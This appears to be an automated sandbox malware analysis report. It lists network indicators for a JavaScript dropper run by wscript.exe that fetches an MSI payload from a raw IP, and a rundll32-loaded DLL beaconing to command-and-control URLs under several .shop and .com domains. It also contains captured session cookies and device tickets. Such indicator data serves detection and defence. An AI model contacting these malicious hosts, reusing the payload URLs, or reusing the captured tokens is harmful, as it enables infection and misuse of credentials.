Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.197.34 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://startmast.shop/live/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714166482925Host: self.events.data.microsoft.comContent-Length: 7981Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 5_2_00000235B5CE8D90
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=ik1S2gvbzXRLjVdx_Y5LJh0w0S_9_5d6ElFayBg60ugD7-6XcInlKtnDSWxvnZdc6RsT5sEwwdujmxNFQp8EP2ZapVOyxYy_Jrmtb15X64AkKhQiB3isKEgC-YcetiMg65hoSKrHKE1skUTiedEtj1AIYbPY_8XEjWEE9T0CDLM
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=UowfF3gRb-VEPPE7VIYxDTZwjoWg8ud9RDcXC8lTIuA_racxo5lcoiIPCNawi8P-2VoGw5HUUmmcSiDTYaOtK75Zr8F2x6a3xTaKMIWLcX8zMSUJcARngZXAUOfcFD7ay0O3J-Bpq4ODfH4oORUkZCP-9pENI39m6kruvf_I5S4
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shop
Source: global traffic HTTP traffic detected: GET /neo.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: 146.19.106.236
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: grizmotras.com
Source: global traffic DNS traffic detected: DNS query: pewwhranet.com
Source: unknown HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000003.1722027817.0000023BEBD7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1632760730.0000023BEBE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723783765.0000023BEBD59000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1633247364.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634073325.0000023BEC085000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1632650735.0000023BEBEE5000.00000004.00000020.00020000.00000000.sdmp, Document_a51_19i793302-14b09981a5569-3684u8.js String found in binary or memory: http://146.19.106.236/neo.msi
Source: ~DF41638D872A10A065.TMP.1.dr String found in binary or memory: http://146.19.106.236/neo.msi-995103104311030230
Source: ~DFA850122BA55067CF.TMP.1.dr, ~DFF122760D5CC42A2E.TMP.1.dr, ~DFA3E2CC6CAB1B816A.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DF2C17C88212509880.TMP.1.dr, ~DF61773DAED613FFB9.TMP.1.dr String found in binary or memory: http://146.19.106.236/neo.msi0
Source: wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.di
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digic
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ennu
Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634223514.0000023BEC442000.00000004.00000020.00020000.00000000.sdmp, MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC4B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1634189374.0000023BEBD71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723806957.0000023BEBD70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1724068170.0000023BEC440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/gsgccr4X)
Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign)
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC4A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/;
Source: wscript.exe, 00000000.00000003.1639949100.0000023BEC4BB000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.1724068170.0000023BEC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0u
Source: wscript.exe, 00000000.00000003.1721307435.0000023BEBC71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1723783765.0000023BEBD59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crtY
Source: wscript.exe, 00000000.00000003.1640046854.0000023BEC499000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdXl
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://t2.symcb.com0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://tl.symcd.com0&
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.cH
Source: rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000006.00000003.2994803348.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/E0#W
Source: rundll32.exe, 00000006.00000003.5750316850.000001800FF2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/H
Source: rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/Li
Source: rundll32.exe, 00000006.00000003.2994803348.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/es
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6962568501.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/S
Source: rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/hy
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/l
Source: rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/rW
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/ras.com/live/
Source: rundll32.exe, 00000006.00000003.5750316850.000001800FF29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/w
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/?
